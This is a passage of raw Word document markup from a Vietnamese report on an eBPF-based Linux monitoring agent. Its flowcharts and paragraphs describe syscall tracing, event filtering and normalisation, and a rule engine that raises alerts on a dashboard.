                <v:rect id="Shape 98" o:spid="_x0000_s1026" o:spt="1" style="position:absolute;left:5625921;top:2230194;height:568500;width:1727100;v-text-anchor:middle;" fillcolor="#CFE2F3" filled="t" stroked="t" coordsize="21600,21600" o:gfxdata="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fTLoH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Sinh Alert</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="_x0000_s1026" o:spid="_x0000_s1026" o:spt="32" type="#_x0000_t32" style="position:absolute;left:6489468;top:2798761;height:298200;width:0;rotation:11796480f;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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&#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WZ3W0b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4949721;top:2514444;height:0;width:676200;rotation:11796480f;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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&#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KAJCo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6489468;top:3897611;height:355800;width:0;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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WsDMa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Shape 102" o:spid="_x0000_s1026" o:spt="202" type="#_x0000_t202" style="position:absolute;left:6145246;top:3899250;height:266100;width:539700;" filled="f" stroked="f" coordsize="21600,21600" o:gfxdata="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Y2evQ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sai</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <v:shape id="Shape 103" o:spid="_x0000_s1026" o:spt="202" type="#_x0000_t202" style="position:absolute;left:5637891;top:2756287;height:537958;width:889381;" filled="f" stroked="f" coordsize="21600,21600" o:gfxdata="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DCsK27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Đúng</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <v:shape id="_x0000_s1026" o:spid="_x0000_s1026" o:spt="32" type="#_x0000_t32" style="position:absolute;left:4949563;top:3497275;height:0;width:446700;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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lMMW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1769407;top:5016304;height:546109;width:16617;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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tuWW7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v:imagedata o:title=""/>
                  <o:lock v:ext="edit" aspectratio="f"/>
                </v:shape>
                <v:shape id="_x0000_s1026" o:spid="_x0000_s1026" o:spt="32" type="#_x0000_t32" style="position:absolute;left:6489471;top:4675648;height:846600;width:17400;rotation:11796480f;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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&#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zDPjlL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1766275;top:5501675;flip:x;height:30600;width:4730400;rotation:11796480f;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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PfmbJK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v:imagedata o:title=""/>
                  <o:lock v:ext="edit" aspectratio="f"/>
                </v:shape>
                <v:shape id="_x0000_s1026" o:spid="_x0000_s1026" o:spt="32" type="#_x0000_t32" style="position:absolute;left:4074353;top:3804046;height:806196;width:4748;rotation:11796480f;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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&#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LJbee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v:fill on="f" focussize="0,0"/>
                  <v:stroke color="#000000" joinstyle="round" endarrow="block"/>
                  <v:imagedata o:title=""/>
                  <o:lock v:ext="edit" aspectratio="f"/>
                </v:shape>
                <v:shape id="_x0000_s1026" o:spid="_x0000_s1026" o:spt="32" type="#_x0000_t32" style="position:absolute;left:2848685;top:4583566;height:17784;width:1238328;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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HgkFi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v:imagedata o:title=""/>
                  <o:lock v:ext="edit" aspectratio="f"/>
                </v:shape>
                <w10:wrap type="none"/>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="vi-V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50" w:name="_Toc132941189"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>: Lưu đồ xử lý tổng thể</w:t>
      </w:r>
      <w:bookmarkEnd w:id="50"/>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>eBPF program được nạp vào kernel, sau đó attach vào tracepoint/kprobe của syscall, khi syscall được thực thi thì callback eBPF mới được kích hoạt thu thập dữ liệu từ kernel về tiến trình này, sau đó gửi vào perf buffer (điểm giao tiếp giữa kernel space và user space).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Phía User Space, hệ thống liên tục theo dõi Perf Buffer để nhận các sự kiện do eBPF gửi lên. Dữ liệu sau khi nhận được sẽ trải qua quá trình lọc(kiểm tra container và danh sách PID bị bỏ qua) và chuẩn hóa nhằm thống nhất cấu trúc trước khi chuyển đến các thành phần xử lý tiếp theo. Sau khi được chuẩn hóa, mỗi sự kiện sẽ được phân phối đến hai nhánh xử lý độc lập:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="420"/>
          <w:tab w:val="clear" w:pos="1260"/>
        </w:tabs>
        <w:ind w:left="1258" w:leftChars="0" w:hanging="418" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Dashboard: nhận toàn bộ các sự kiện hợp lệ để hiển thị theo thời gian thực, đồng thời hỗ trợ các chức năng theo dõi và tra cứu.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="420"/>
          <w:tab w:val="clear" w:pos="1260"/>
        </w:tabs>
        <w:ind w:left="1258" w:leftChars="0" w:hanging="418" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Rule Engine: tiếp nhận các sự kiện để đối chiếu với tập luật đã định nghĩa. Những sự kiện thỏa mãn điều kiện của một hoặc nhiều rule sẽ được chuyển thành Alert và gửi đến Dashboard để hiển thị cho người quản trị.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:id="51" w:name="_heading=h.bqv8al4bx4vy" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="51"/>
      <w:bookmarkStart w:id="52" w:name="_Toc1468785264"/>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">eBPF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>program</w:t>
      </w:r>
      <w:bookmarkEnd w:id="52"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
                <wp:extent cx="2946400" cy="5745480"/>
                <wp:effectExtent l="4445" t="4445" r="0" b="22225"/>
                <wp:docPr id="76" name="Group 76"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="488775" y="137575"/>
                          <a:ext cx="2946281" cy="5745480"/>
                          <a:chOff x="493561" y="142350"/>
                          <a:chExt cx="2158152" cy="5082725"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="112" name="Shape 112"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="665461" y="142350"/>
                            <a:ext cx="1309500" cy="537900"/>
                          </a:xfrm>
                          <a:prstGeom prst="ellipse">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kernel</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="113" name="Shape 113"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="721261" y="1065750"/>
                            <a:ext cx="1197900" cy="45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System call</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="114" name="Shape 114"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="587461" y="2050400"/>
                            <a:ext cx="1465500" cy="45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eBPF program</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="115" name="Shape 115"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="493561" y="2939375"/>
                            <a:ext cx="1653300" cy="45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thông tin</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="116" name="Shape 116"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="493561" y="3929975"/>
                            <a:ext cx="1653300" cy="45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Perf buffer</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="117" name="Shape 117"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="493561" y="4768175"/>
                            <a:ext cx="1653300" cy="45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User space</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="77" name="Straight Arrow Connector 77"/>
                        <wps:cNvCnPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1320211" y="680250"/>
                            <a:ext cx="0" cy="385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78" name="Straight Arrow Connector 78"/>
                        <wps:cNvCnPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1320211" y="1522650"/>
                            <a:ext cx="0" cy="527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20" name="Shape 120"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1341938" y="1655935"/>
                            <a:ext cx="1309775" cy="324808"/>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sinh sự kiện</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="79" name="Straight Arrow Connector 79"/>
                        <wps:cNvCnPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1320211" y="2507300"/>
                            <a:ext cx="0" cy="4320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86" name="Straight Arrow Connector 86"/>
                        <wps:cNvCnPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1320211" y="3396275"/>
                            <a:ext cx="0" cy="533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87" name="Straight Arrow Connector 87"/>
                        <wps:cNvCnPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1320211" y="4386875"/>
                            <a:ext cx="0" cy="381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452.4pt;width:232pt;" coordorigin="493561,142350" coordsize="2158152,5082725" o:gfxdata="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">
                <o:lock v:ext="edit" aspectratio="f"/>
                <v:shape id="Shape 112" o:spid="_x0000_s1026" o:spt="3" type="#_x0000_t3" style="position:absolute;left:665461;top:142350;height:537900;width:1309500;v-text-anchor:middle;" fillcolor="#CFE2F3" filled="t" stroked="t" coordsize="21600,21600" o:gfxdata="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Yn5A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kernel</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <v:rect id="Shape 113" o:spid="_x0000_s1026" o:spt="1" style="position:absolute;left:721261;top:1065750;height:456900;width:1197900;v-text-anchor:middle;" fillcolor="#CFE2F3" filled="t" stroked="t" coordsize="21600,21600" o:gfxdata="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67w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System call</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Shape 114" o:spid="_x0000_s1026" o:spt="1" style="position:absolute;left:587461;top:2050400;height:456900;width:1465500;v-text-anchor:middle;" fillcolor="#CFE2F3" filled="t" stroked="t" coordsize="21600,21600" o:gfxdata="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hUlkb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eBPF program</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Shape 115" o:spid="_x0000_s1026" o:spt="1" style="position:absolute;left:493561;top:2939375;height:456900;width:1653300;v-text-anchor:middle;" fillcolor="#CFE2F3" filled="t" stroked="t" coordsize="21600,21600" o:gfxdata="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OHvyA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thông tin</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Shape 116" o:spid="_x0000_s1026" o:spt="1" style="position:absolute;left:493561;top:3929975;height:456900;width:1653300;v-text-anchor:middle;" fillcolor="#CFE2F3" filled="t" stroked="t" coordsize="21600,21600" o:gfxdata="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7MYve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Perf buffer</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Shape 117" o:spid="_x0000_s1026" o:spt="1" style="position:absolute;left:493561;top:4768175;height:456900;width:1653300;v-text-anchor:middle;" fillcolor="#CFE2F3" filled="t" stroked="t" coordsize="21600,21600" o:gfxdata="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RgMds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User space</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="_x0000_s1026" o:spid="_x0000_s1026" o:spt="32" type="#_x0000_t32" style="position:absolute;left:1320211;top:680250;height:385500;width:0;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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NupQu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1320211;top:1522650;height:527700;width:0;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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PCUAXL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Shape 120" o:spid="_x0000_s1026" o:spt="202" type="#_x0000_t202" style="position:absolute;left:1341938;top:1655935;height:324808;width:1309775;" filled="f" stroked="f" coordsize="21600,21600" o:gfxdata="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sinh sự kiện</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <v:shape id="_x0000_s1026" o:spid="_x0000_s1026" o:spt="32" type="#_x0000_t32" style="position:absolute;left:1320211;top:2507300;height:432000;width:0;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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Nppce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1320211;top:3396275;height:533700;width:0;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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XI0GS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1320211;top:4386875;height:381300;width:0;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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4b+QJ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w10:wrap type="none"/>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>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3</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:bookmarkStart w:id="53" w:name="_Toc474696696"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>: Lưu đồ xử lý eBPF Agent</w:t>
      </w:r>
      <w:bookmarkEnd w:id="53"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">eBPF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">program </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>là thành phần cốt lõi của hệ thống, chịu trách nhiệm thu thập các sự kiện phát sinh từ Linux Kernel. Agent dùng công nghệ eBPF để nạp các chương trình eBPF vào kernel và attach vào các hook của những system call quan trọng như execve, openat, connect.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Khi một system call được thực thi, chương trình eBPF tương ứng sẽ được kích hoạt. Tại đây, callback function sẽ thu thập các thông tin cần thiết của sự kiện như PID, PPID, TGID, tên tiến trình, tệp tin … Sau khi thu thập dữ liệu được ghi vào Perf buffer, là cơ chế trao đổi dữ liệu hiệu quả giữa Kernel space và User space do eBPF cung cấp</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:id="54" w:name="_heading=h.qknu6ep9xf7z" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="54"/>
      <w:bookmarkStart w:id="55" w:name="_Toc1520688188"/>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Thu thập và chuẩn hóa dữ liệu</w:t>
      </w:r>
      <w:bookmarkEnd w:id="55"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
                <wp:extent cx="4566920" cy="4420870"/>
                <wp:effectExtent l="4445" t="4445" r="0" b="13335"/>
                <wp:docPr id="9" name="Group 9"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="312100" y="208400"/>
                          <a:ext cx="4567213" cy="4420870"/>
                          <a:chOff x="316875" y="213175"/>
                          <a:chExt cx="4555675" cy="5239888"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="138" name="Shape 138"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2690025" y="213175"/>
                            <a:ext cx="1624200" cy="6192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Perf Buffer</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="139" name="Shape 139"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2690025" y="1400850"/>
                            <a:ext cx="1624200" cy="6192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sự kiện</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="140" name="Shape 140"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2426852" y="2440993"/>
                            <a:ext cx="2142282" cy="866290"/>
                          </a:xfrm>
                          <a:prstGeom prst="flowChartDecision">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Lọc sự kiện</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="141" name="Shape 141"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="316875" y="2547888"/>
                            <a:ext cx="1624200" cy="6192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Bỏ qua</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="142" name="Shape 142"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2690025" y="3690863"/>
                            <a:ext cx="1624200" cy="6192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Chuẩn hóa</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="143" name="Shape 143"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2690025" y="4833863"/>
                            <a:ext cx="1624200" cy="6192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Logger</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="90" name="Straight Arrow Connector 90"/>
                        <wps:cNvCnPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3502125" y="802050"/>
                            <a:ext cx="0" cy="598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45" name="Shape 145"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3613912" y="928937"/>
                            <a:ext cx="1258638" cy="457606"/>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Có sự kiện</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="91" name="Straight Arrow Connector 91"/>
                        <wps:cNvCnPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3502125" y="2020050"/>
                            <a:ext cx="0" cy="439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92" name="Straight Arrow Connector 92"/>
                        <wps:cNvCnPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3502125" y="3251350"/>
                            <a:ext cx="0" cy="439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99" name="Straight Arrow Connector 99"/>
                        <wps:cNvCnPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3502125" y="4310063"/>
                            <a:ext cx="0" cy="523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0" name="Straight Arrow Connector 100"/>
                        <wps:cNvCnPr/>
                        <wps:spPr>
                          <a:xfrm flipH="1" flipV="1">
                            <a:off x="1941535" y="2857541"/>
                            <a:ext cx="489615" cy="1902"/>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50" name="Shape 150"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2002449" y="2440993"/>
                            <a:ext cx="700581" cy="457606"/>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Sai</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="151" name="Shape 151"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3010880" y="3229008"/>
                            <a:ext cx="700581" cy="457606"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>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Đúng</w:t>
                              </w:r>
                            </w:p>
                            <w:p>
                              <w:pPr>
                                <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
                                <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                                <w:jc w:val="left"/>
                                <w:rPr>
                                  <w:sz w:val="24"/>
                                  <w:szCs w:val="24"/>
                                </w:rPr>
                              </w:pPr>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group id="_x0000_s1026" o:spid="_x0000_s1026" o:spt="203" style="height:348.1pt;width:359.6pt;" coordorigin="316875,213175" coordsize="4555675,5239888" o:gfxdata="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">
                <o:lock v:ext="edit" aspectratio="f"/>
                <v:rect id="Shape 138" o:spid="_x0000_s1026" o:spt="1" style="position:absolute;left:2690025;top:213175;height:619200;width:1624200;v-text-anchor:middle;" fillcolor="#CFE2F3" filled="t" stroked="t" coordsize="21600,21600" o:gfxdata="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rqg9+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Perf Buffer</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Shape 139" o:spid="_x0000_s1026" o:spt="1" style="position:absolute;left:2690025;top:1400850;height:619200;width:1624200;v-text-anchor:middle;" fillcolor="#CFE2F3" filled="t" stroked="t" coordsize="21600,21600" o:gfxdata="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Tmqu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Thu thập sự kiện</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Shape 140" o:spid="_x0000_s1026" o:spt="110" type="#_x0000_t110" style="position:absolute;left:2426852;top:2440993;height:866290;width:2142282;v-text-anchor:middle;" fillcolor="#CFE2F3" filled="t" stroked="t" coordsize="21600,21600" o:gfxdata="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Lọc sự kiện</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <v:rect id="Shape 141" o:spid="_x0000_s1026" o:spt="1" style="position:absolute;left:316875;top:2547888;height:619200;width:1624200;v-text-anchor:middle;" fillcolor="#CFE2F3" filled="t" stroked="t" coordsize="21600,21600" o:gfxdata="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CiltWe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Bỏ qua</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Shape 142" o:spid="_x0000_s1026" o:spt="1" style="position:absolute;left:2690025;top:3690863;height:619200;width:1624200;v-text-anchor:middle;" fillcolor="#CFE2F3" filled="t" stroked="t" coordsize="21600,21600" o:gfxdata="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JES+m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Chuẩn hóa</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
